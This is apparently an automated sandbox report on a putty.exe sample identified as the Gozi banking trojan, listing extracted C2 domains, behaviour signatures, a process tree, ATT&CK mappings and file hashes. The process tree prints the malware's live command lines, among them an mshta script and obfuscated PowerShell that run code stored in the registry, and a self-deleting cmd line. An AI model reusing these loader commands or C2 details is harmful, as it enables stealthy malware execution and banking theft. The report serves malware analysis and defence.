Overview

overview

10

Static

static

3

putty.exe

windows7-x64

10

putty.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-10-2023 00:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    putty.exe

  • Size

    292KB

  • MD5

    33ddb8880db29cac11e05bfc30bcec6b

  • SHA1

    fb90dc44ba4b8f6b356735bd46231e6f99e15b62

  • SHA256

    1aa20713c9af2eeec3756392dca573d39bf5fa8d18a14087d67cd39f07509eea

  • SHA512

    b99e8ac3be923ea8eb21967595f93bef903b9719300045862dca54bf64b709f7c10e536d8407fa07da67e89245ffa15f9608531700a668b84d0a3a8383f51e0f

  • SSDEEP

    3072:/yktbYYNGzHPg2I1eWy9O9El/pjBXDzrFEd1Uot:K4YIGz4ToTHl9BXz6Uo

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

http://igrovdow.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3840
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3204
    • C:\Users\Admin\AppData\Local\Temp\putty.exe
      "C:\Users\Admin\AppData\Local\Temp\putty.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4432
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 1408
        3⤵
        • Program crash
        PID:3256
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Dw0d='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dw0d).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9\\\MemoryLocal'));if(!window.flag)close()</script>"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name mnwhndsu -value gp; new-alias -name tuivcejh -value iex; tuivcejh ([System.Text.Encoding]::ASCII.GetString((mnwhndsu "HKCU:Software\AppDataLow\Software\Microsoft\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9").ProcessActive))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2208
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1zeuxwee\1zeuxwee.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2304
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES266F.tmp" "c:\Users\Admin\AppData\Local\Temp\1zeuxwee\CSC29F02C0858D46DFB622CE35C74A8E.TMP"
            5⤵
              PID:3532
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\llr1m0nv\llr1m0nv.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4140
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2805.tmp" "c:\Users\Admin\AppData\Local\Temp\llr1m0nv\CSC196DC488EF0142A58B251BC647B8AC5D.TMP"
              5⤵
                PID:2576
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:3460
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:3044
        • C:\Windows\syswow64\cmd.exe
          "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
          2⤵
            PID:4612
        • C:\Windows\System32\RuntimeBroker.exe
          C:\Windows\System32\RuntimeBroker.exe -Embedding
          1⤵
            PID:4868
          • C:\Windows\System32\RuntimeBroker.exe
            C:\Windows\System32\RuntimeBroker.exe -Embedding
            1⤵
              PID:3684
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:2232
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4432 -ip 4432
              1⤵
                PID:3264

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Initial Access

              Execution

              Persistence

              Privilege Escalation

              Defense Evasion

              Credential Access

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              2
              T1082

              Remote System Discovery

              1
              T1018

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Resource Development

              Reconnaissance

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\1zeuxwee\1zeuxwee.dll
                Filesize

                3KB

                MD5

                2ba2244e225dbeb2cb686d7569578888

                SHA1

                480100ea41194aa16909c83b7ba676cddd5fcedf

                SHA256

                e536059356a8057bd545b49312de4fb248f8c834577641e5d2d0f6d153483c0b

                SHA512

                ed4adfb00b31ada66ca3f37a4710a3c79ec0d582837d1daea0979c045a765a0189fbe4ec5a3ea59f344dfe4b8e3659cbcbc2749c9272941e21ce49b120216d85

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RES266F.tmp
                Filesize

                1KB

                MD5

                6d508d25a6f600b2b5328c492914d7c0

                SHA1

                379f2ac9d65b1ed19ea19844f23f4814d52dc591

                SHA256

                92cfcf39c18c24ac9335ced0970f2e4b371dd6da32de653d9b54764bc796ff45

                SHA512

                fa85f21ecb69c0ffc32db851ce95a305c8beffa43a764c130088f427cd7bf6829b4ceda5399aa9b73e9da61eaa55cffd0dea145c25ec81ce18f4679f7c8782fc

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RES2805.tmp
                Filesize

                1KB

                MD5

                d77df5f44c46ae390f5fb20d7165f160

                SHA1

                16a98fa40ac2c1a72402327d7598e8fc7a3ddc46

                SHA256

                a2ffdafe8bc0dad7e5cff0c6137fbb370b77d9fc66935aec330b757a5ccd145c

                SHA512

                b51690def06708655c00dd0d52c85a7b301db4eefcabb460ec1da4b95a482c9f8e968dd12d4a5cec0b7cf147d04b57e9c4f7d358d08856a7b167c9091ca885a8

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2aaaxpnr.bud.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\llr1m0nv\llr1m0nv.dll
                Filesize

                3KB

                MD5

                465b742bd8de790993fc534d72f10b7c

                SHA1

                13290eb421ac9f3db797620cc50eff137b0cea80

                SHA256

                c8a73d005f2db1a2a013cd4abc2a1e95d866cb0b83939ef6cb7b1be808486efc

                SHA512

                4a9b4f3fb480137e88c00055c22c2966d49d264b634332eba0629d9c4ba6d2f78bf4e2c0621a0bb58bba4d6b04f333d4fe147a774de9bb6d5e9062a3b02e6bd2

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\1zeuxwee\1zeuxwee.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\1zeuxwee\1zeuxwee.cmdline
                Filesize

                369B

                MD5

                ddeeaee68aba1ea0c5d9a1e5ea5d16fa

                SHA1

                1ff2d6348ee1c2004f561cac789127537a75e4d4

                SHA256

                554abbd84f66a8367070d0cacaaa6aeb8e163afbf548866efb9199743355a0b5

                SHA512

                4a8990bd6ebdee060ee2eac6220397f944c4333eed9ff02dd2ee629739732cf408f6ce6bea4c2a6b81e75acfcabaa1027b038fc3deb2dddea089faf9c6547acc

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\1zeuxwee\CSC29F02C0858D46DFB622CE35C74A8E.TMP
                Filesize

                652B

                MD5

                d625d7c50c9d22bfa73a1f6aff7f5201

                SHA1

                740540c70ab013fe8ec67aeef9178f0394d9880d

                SHA256

                bbc70bf5ae8265443da55029aa0364eaf0f61110f698d82d33efa2757825a24a

                SHA512

                749bd5c058918db6e0e5bf7d0a073dbececdc92ddd10b509a181e10b00cff97ef081392facd87e855f29dfea688c494084444c9b662bedfb3eb04818336046f7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\llr1m0nv\CSC196DC488EF0142A58B251BC647B8AC5D.TMP
                Filesize

                652B

                MD5

                4796ddc7839b704946a846c300efcb52

                SHA1

                af6d32c651c83b40c7302f8e2802ebd4958a1610

                SHA256

                8c770dd27a092bce429ebae770e9e5c5a579431cc41923e7df7914bf01449cc8

                SHA512

                e1b39905da3050fdcead696253f4f70c8fd0a627010ab45a367a55c1060110fa97b56b8dc4bd98fde9c703e3179f6774268eb7547443395077f6e593a1fe0202

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\llr1m0nv\llr1m0nv.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\llr1m0nv\llr1m0nv.cmdline
                Filesize

                369B

                MD5

                d23a129d2327b64ed93b8c928e4b0989

                SHA1

                4b91a3dc1a14e917606e666fefd8883333876c71

                SHA256

                b549cbe580dd87d2851906b05467d7fe24c5d74dc139c16663968042eaa1946d

                SHA512

                a5600e91370983cb8088658a9a1368cf9cc3659b2ecfc2b9934229e7225824c6f29d1ddf0a32ecd732b32b9469526e46f9822ce8c33738c3e62395e3a9642ef3

                Download Submit
              • memory/2208-53-0x000001BD584D0000-0x000001BD5850D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/2208-51-0x000001BD584C0000-0x000001BD584C8000-memory.dmp
                Filesize

                32KB

                Download
              • memory/2208-23-0x000001BD58200000-0x000001BD58210000-memory.dmp
                Filesize

                64KB

                Download
              • memory/2208-22-0x00007FFA742E0000-0x00007FFA74DA1000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/2208-18-0x000001BD58310000-0x000001BD58332000-memory.dmp
                Filesize

                136KB

                Download
              • memory/2208-24-0x000001BD58200000-0x000001BD58210000-memory.dmp
                Filesize

                64KB

                Download
              • memory/2208-37-0x000001BD584A0000-0x000001BD584A8000-memory.dmp
                Filesize

                32KB

                Download
              • memory/2208-68-0x000001BD584D0000-0x000001BD5850D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/2208-66-0x00007FFA742E0000-0x00007FFA74DA1000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/2232-89-0x00000196BCF00000-0x00000196BCF01000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2232-88-0x00000196BCE50000-0x00000196BCEF4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/2232-118-0x00000196BCE50000-0x00000196BCEF4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3044-112-0x000001C560310000-0x000001C5603B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3044-111-0x000001C560170000-0x000001C560171000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3044-102-0x000001C560310000-0x000001C5603B4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3204-107-0x00000000092D0000-0x0000000009374000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3204-55-0x00000000092D0000-0x0000000009374000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3204-56-0x0000000001120000-0x0000000001121000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3460-109-0x000002AF83CB0000-0x000002AF83CB1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3460-94-0x000002AF83D20000-0x000002AF83DC4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3460-110-0x000002AF83D20000-0x000002AF83DC4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3684-116-0x000002B6A08C0000-0x000002B6A0964000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3684-76-0x000002B6A08C0000-0x000002B6A0964000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3684-77-0x000002B6A0880000-0x000002B6A0881000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3840-71-0x00000242D30B0000-0x00000242D3154000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3840-70-0x00000242D3160000-0x00000242D3161000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3840-114-0x00000242D30B0000-0x00000242D3154000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4432-2-0x00000000023F0000-0x00000000023FB000-memory.dmp
                Filesize

                44KB

                Download
              • memory/4432-1-0x0000000002420000-0x0000000002520000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/4432-3-0x0000000000400000-0x000000000228F000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/4432-4-0x0000000002410000-0x000000000241D000-memory.dmp
                Filesize

                52KB

                Download
              • memory/4432-7-0x0000000002420000-0x0000000002520000-memory.dmp
                Filesize

                1024KB

                Download
              • memory/4432-8-0x0000000000400000-0x000000000228F000-memory.dmp
                Filesize

                30.6MB

                Download
              • memory/4432-9-0x00000000023F0000-0x00000000023FB000-memory.dmp
                Filesize

                44KB

                Download
              • memory/4612-100-0x0000000000D70000-0x0000000000E08000-memory.dmp
                Filesize

                608KB

                Download
              • memory/4612-108-0x0000000000D70000-0x0000000000E08000-memory.dmp
                Filesize

                608KB

                Download
              • memory/4868-82-0x0000027F73BC0000-0x0000027F73BC1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4868-81-0x0000027F74420000-0x0000027F744C4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4868-117-0x0000027F74420000-0x0000027F744C4000-memory.dmp
                Filesize

                656KB

                Download